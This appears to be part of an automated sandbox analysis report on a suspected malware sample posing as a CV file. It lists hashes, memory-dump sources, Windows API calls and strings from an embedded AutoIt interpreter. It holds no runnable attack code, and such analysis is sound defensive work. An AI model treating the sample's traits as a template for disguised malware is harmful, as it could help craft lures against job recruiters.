                                                                                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                        • Instruction ID: 4f80848773e6d4af057db59aadf7e3fc732da655b9fea85a228572ed640eaf9d
                                                                                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                        • Instruction Fuzzy Hash: 9341D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1707401369.00000000019F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 019F9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_19f9000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                        • Instruction ID: 1cd3561e5c2299db7965da93f033e59c011d835a9f3f43674c4e3a639b547633
                                                                                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                        • Instruction Fuzzy Hash: EF019D78A00209EFCB44DF98C5909AEF7F5FB88314F208699E919A7305D731AE41DB80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1707401369.00000000019F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 019F9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_19f9000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                        • Instruction ID: 4ecbec78ad0b0fca0604dcb2e517bdaebf419f2c918835d25dc9a6ace6ac4759
                                                                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                        • Instruction Fuzzy Hash: F1019D78A00209EFCB48DF98C5909AEF7F5FB88310F208599E909A7745D731AE41DB80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1707401369.00000000019F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 019F9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_19f9000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 003DA2FE
                                                                                        • DeleteObject.GDI32(00000000), ref: 003DA310
                                                                                        • DestroyWindow.USER32 ref: 003DA31E
                                                                                        • GetDesktopWindow.USER32 ref: 003DA338
                                                                                        • GetWindowRect.USER32(00000000), ref: 003DA33F
                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 003DA480
                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 003DA490
                                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003DA4D8
                                                                                        • GetClientRect.USER32(00000000,?), ref: 003DA4E4
                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003DA51E
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003DA540
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003DA553
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003DA55E
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 003DA567
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003DA576
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 003DA57F
                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003DA586
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 003DA591
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003DA5A3
                                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0040D9BC,00000000), ref: 003DA5B9
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 003DA5C9
                                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 003DA5EF
                                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 003DA60E
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003DA630
                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003DA81D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                        • API String ID: 2211948467-2373415609
                                                                                        • Opcode ID: 55cc8d093c80774f8088f0c40517a2209f53c87e257bbc3274fcd70c84e289ef
                                                                                        • Instruction ID: a231889076b41539d88ba053209f8307089f82008f71ef679300faaafdc5048c
                                                                                        • Opcode Fuzzy Hash: 55cc8d093c80774f8088f0c40517a2209f53c87e257bbc3274fcd70c84e289ef
                                                                                        • Instruction Fuzzy Hash: 7102AD76900204EFDB15DFA4DE89EAE7BB9FB49310F048169F915AB2A0C770DD41CB64
                                                                                        APIs
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 003ED2DB
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 003ED30C
                                                                                        • GetSysColor.USER32(0000000F), ref: 003ED318
                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 003ED332
                                                                                        • SelectObject.GDI32(?,00000000), ref: 003ED341
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 003ED36C
                                                                                        • GetSysColor.USER32(00000010), ref: 003ED374
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 003ED37B
                                                                                        • FrameRect.USER32(?,?,00000000), ref: 003ED38A
                                                                                        • DeleteObject.GDI32(00000000), ref: 003ED391
                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 003ED3DC
                                                                                        • FillRect.USER32(?,?,00000000), ref: 003ED40E
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003ED439
                                                                                          • Part of subcall function 003ED575: GetSysColor.USER32(00000012), ref: 003ED5AE
                                                                                          • Part of subcall function 003ED575: SetTextColor.GDI32(?,?), ref: 003ED5B2
                                                                                          • Part of subcall function 003ED575: GetSysColorBrush.USER32(0000000F), ref: 003ED5C8
                                                                                          • Part of subcall function 003ED575: GetSysColor.USER32(0000000F), ref: 003ED5D3
                                                                                          • Part of subcall function 003ED575: GetSysColor.USER32(00000011), ref: 003ED5F0
                                                                                          • Part of subcall function 003ED575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003ED5FE
                                                                                          • Part of subcall function 003ED575: SelectObject.GDI32(?,00000000), ref: 003ED60F
                                                                                          • Part of subcall function 003ED575: SetBkColor.GDI32(?,00000000), ref: 003ED618
                                                                                          • Part of subcall function 003ED575: SelectObject.GDI32(?,?), ref: 003ED625
                                                                                          • Part of subcall function 003ED575: InflateRect.USER32(?,000000FF,000000FF), ref: 003ED644
                                                                                          • Part of subcall function 003ED575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003ED65B
                                                                                          • Part of subcall function 003ED575: GetWindowLongW.USER32(00000000,000000F0), ref: 003ED670
                                                                                          • Part of subcall function 003ED575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003ED698
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                        • String ID:
                                                                                        • API String ID: 3521893082-0
                                                                                        • Opcode ID: ea609fe8ebb9e27a0d1e382ff2c8ce419fdedbc6c5d86be236aebde340ccda96
                                                                                        • Instruction ID: a1cb3cadcac07727163389b52e987076abd1bb3dd840f26891c71ab452d714c2
                                                                                        • Opcode Fuzzy Hash: ea609fe8ebb9e27a0d1e382ff2c8ce419fdedbc6c5d86be236aebde340ccda96
                                                                                        • Instruction Fuzzy Hash: 49919271408311BFC7119FA5DD08E6B7BA9FF89325F100B29F962A61E0CB71D948CB56
                                                                                        APIs
                                                                                        • DestroyWindow.USER32 ref: 0039B98B
                                                                                        • DeleteObject.GDI32(00000000), ref: 0039B9CD
                                                                                        • DeleteObject.GDI32(00000000), ref: 0039B9D8
                                                                                        • DestroyIcon.USER32(00000000), ref: 0039B9E3
                                                                                        • DestroyWindow.USER32(00000000), ref: 0039B9EE
                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 003FD2AA
                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 003FD2E3
                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 003FD711
                                                                                          • Part of subcall function 0039B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0039B759,?,00000000,?,?,?,?,0039B72B,00000000,?), ref: 0039BA58
                                                                                        • SendMessageW.USER32 ref: 003FD758
                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 003FD76F
                                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 003FD785
                                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 003FD790
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                        • String ID: 0
                                                                                        • API String ID: 464785882-4108050209
                                                                                        • Opcode ID: a491d0527b6ecd53710cc1a3a36618b5ee9465c9d02a181a4289d49fd40193fc
                                                                                        • Instruction ID: ebe4ba344be0154d5919071c61d4084b9925176d87e2aabad1b2745536da2177
                                                                                        • Opcode Fuzzy Hash: a491d0527b6ecd53710cc1a3a36618b5ee9465c9d02a181a4289d49fd40193fc
                                                                                        • Instruction Fuzzy Hash: A712BF30604205EFDB12DF28DA88BB9B7E6FF05304F154569EA89DB662CB31EC45CB91
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 003CDBD6
                                                                                        • GetDriveTypeW.KERNEL32(?,0041DC54,?,\\.\,0041DC00), ref: 003CDCC3
                                                                                        • SetErrorMode.KERNEL32(00000000,0041DC54,?,\\.\,0041DC00), ref: 003CDE29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DriveType
                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                        • API String ID: 2907320926-4222207086
                                                                                        • Opcode ID: 4f9e2a679a109b32daccceb1dfe6f1b84b12025bc26ef249a67049fcfe549e9a
                                                                                        • Instruction ID: 7f5f9a7fa405791ce465b35a05d5beed0084fe770ba39b63adad1f7359fbd831
                                                                                        • Opcode Fuzzy Hash: 4f9e2a679a109b32daccceb1dfe6f1b84b12025bc26ef249a67049fcfe549e9a
                                                                                        • Instruction Fuzzy Hash: 365180306483019B8602EF24CC96F29F7A4FE58706F20686EB017DF692DA65ED45D746
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                        • API String ID: 1038674560-86951937
                                                                                        • Opcode ID: f79d747a94b90661dde5dea66dd957de27bb2ce563d42165321ac0b0b23ddde2
                                                                                        • Instruction ID: 38bbd0b34b84c57ed5bfb749e1030bd10d1bdb4edbc40befff69eff6078e63d4
                                                                                        • Opcode Fuzzy Hash: f79d747a94b90661dde5dea66dd957de27bb2ce563d42165321ac0b0b23ddde2
                                                                                        • Instruction Fuzzy Hash: 3B81F170650309ABCB23BA64DD82FBB7768EF25300F145069F906AE186EB74DA45C3A5
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,0041DC00), ref: 003E6449
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                        • API String ID: 3964851224-45149045
                                                                                        • Opcode ID: fe33091dcec8a4a1c04b20e94cff8a0dc58d80a832e60e75982872f764f45700
                                                                                        • Instruction ID: cf7158f7afcb61f68472a6217a4a7d652e25463c120aea67a001114ccc66795e
                                                                                        • Opcode Fuzzy Hash: fe33091dcec8a4a1c04b20e94cff8a0dc58d80a832e60e75982872f764f45700
                                                                                        • Instruction Fuzzy Hash: B4C1A3342043918BCB06EF11C552AAEB7A5BFA5384F044959F8965F7E2DB30ED4ACB42
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000012), ref: 003ED5AE
                                                                                        • SetTextColor.GDI32(?,?), ref: 003ED5B2
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 003ED5C8
                                                                                        • GetSysColor.USER32(0000000F), ref: 003ED5D3
                                                                                        • CreateSolidBrush.GDI32(?), ref: 003ED5D8
                                                                                        • GetSysColor.USER32(00000011), ref: 003ED5F0
                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003ED5FE
                                                                                        • SelectObject.GDI32(?,00000000), ref: 003ED60F
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 003ED618
                                                                                        • SelectObject.GDI32(?,?), ref: 003ED625
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 003ED644
                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003ED65B
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 003ED670
                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003ED698
                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003ED6BF
                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 003ED6DD
                                                                                        • DrawFocusRect.USER32(?,?), ref: 003ED6E8
                                                                                        • GetSysColor.USER32(00000011), ref: 003ED6F6
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 003ED6FE
                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 003ED712
                                                                                        • SelectObject.GDI32(?,003ED2A5), ref: 003ED729
                                                                                        • DeleteObject.GDI32(?), ref: 003ED734
                                                                                        • SelectObject.GDI32(?,?), ref: 003ED73A
                                                                                        • DeleteObject.GDI32(?), ref: 003ED73F
                                                                                        • SetTextColor.GDI32(?,?), ref: 003ED745
                                                                                        • SetBkColor.GDI32(?,?), ref: 003ED74F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                        • String ID:
                                                                                        • API String ID: 1996641542-0
                                                                                        • Opcode ID: 5da1ab36a32b124b170bc7672c7d0fa001318da53f6ec1b1c1883718ab390887
                                                                                        • Instruction ID: e2b10e395fb61a904828547a529631ecfa727b7b06968e34f3077979df6c5103
                                                                                        • Opcode Fuzzy Hash: 5da1ab36a32b124b170bc7672c7d0fa001318da53f6ec1b1c1883718ab390887
                                                                                        • Instruction Fuzzy Hash: DE515A71D00218BFDF119FA9DD48EAE7B79EB08324F114625FA15BB2E0D7719A40CB50
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003EB7B0
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003EB7C1
                                                                                        • CharNextW.USER32(0000014E), ref: 003EB7F0
                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003EB831
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003EB847
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003EB858
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003EB875
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 003EB8C7
                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 003EB8DD
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 003EB90E
                                                                                        • _memset.LIBCMT ref: 003EB933
                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003EB97C
                                                                                        • _memset.LIBCMT ref: 003EB9DB
                                                                                        • SendMessageW.USER32 ref: 003EBA05
                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 003EBA5D
                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 003EBB0A
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 003EBB2C
                                                                                        • GetMenuItemInfoW.USER32(?), ref: 003EBB76
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003EBBA3
                                                                                        • DrawMenuBar.USER32(?), ref: 003EBBB2
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 003EBBDA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                        • String ID: 0
                                                                                        • API String ID: 1073566785-4108050209
                                                                                        • Opcode ID: 3d20b9fcc0a48be9d8694303702bcd45f94cea2337526ecb16e9924630c1ca3b
                                                                                        • Instruction ID: a065163cfc501c2a826bcbace1cdc8e42a6933b503500551e1df9a6fe7870ad2
                                                                                        • Opcode Fuzzy Hash: 3d20b9fcc0a48be9d8694303702bcd45f94cea2337526ecb16e9924630c1ca3b
                                                                                        • Instruction Fuzzy Hash: 3BE17F75900269ABDF239FA6CC84EEFBB78EF05710F108266F919AA1D1D7708945CF60
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Foreground
                                                                                        • String ID: ACTIVE$ALL$CLASS$H+C$HANDLE$INSTANCE$L+C$LAST$P+C$REGEXPCLASS$REGEXPTITLE$T+C$TITLE
                                                                                        • API String ID: 62970417-3904684051
                                                                                        • Opcode ID: 09f4c29f42c74347326d684bbde0d6e22397a4e63359d16ddcdf6e2ea8997c48
                                                                                        • Instruction ID: c33ecc440e41f27e9978f2c5fbad38f81246bc499526817dd6bb51479005d7a6
                                                                                        • Opcode Fuzzy Hash: 09f4c29f42c74347326d684bbde0d6e22397a4e63359d16ddcdf6e2ea8997c48
                                                                                        • Instruction Fuzzy Hash: C3D11730504706EBCB06EF20C9819ABFBB4BF54304F104E59F5969B6A1DB34E99ACF91
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 003E778A
                                                                                        • GetDesktopWindow.USER32 ref: 003E779F
                                                                                        • GetWindowRect.USER32(00000000), ref: 003E77A6
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003E7808
                                                                                        • DestroyWindow.USER32(?), ref: 003E7834
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003E785D
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003E787B
                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003E78A1
                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 003E78B6
                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003E78C9
                                                                                        • IsWindowVisible.USER32(?), ref: 003E78E9
                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 003E7904
                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 003E7918
                                                                                        • GetWindowRect.USER32(?,?), ref: 003E7930
                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 003E7956
                                                                                        • GetMonitorInfoW.USER32 ref: 003E7970
                                                                                        • CopyRect.USER32(?,?), ref: 003E7987
                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 003E79F2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
